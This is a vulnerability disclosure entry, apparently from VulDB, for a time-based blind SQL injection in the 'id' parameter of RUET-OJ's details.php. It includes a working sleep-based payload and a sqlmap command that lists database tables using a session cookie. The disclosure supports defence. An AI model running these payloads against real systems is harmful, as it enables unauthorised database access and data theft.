| عنوان | shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - details.php |
|---|
| الوصف | There is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the details.php file, allowing an attacker to dump the entire database. You must be authenticated
[POC]
With burp browser
GET /details.php?id=1'and+sleep(5)%23
Automate with sqlmap to perform the database dump.
sqlmap -u http://ip/details.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| المستخدم | ManinhuGuitar (UID 84672) |
|---|
| ارسال | 14/10/2025 01:42 AM (6 أشهر منذ) |
|---|
| الاعتدال | 27/10/2025 11:22 AM (13 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 330106 [shawon100 RUET OJ حتى 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /details.php معرف حقن SQL] |
|---|
| النقاط | 17 |
|---|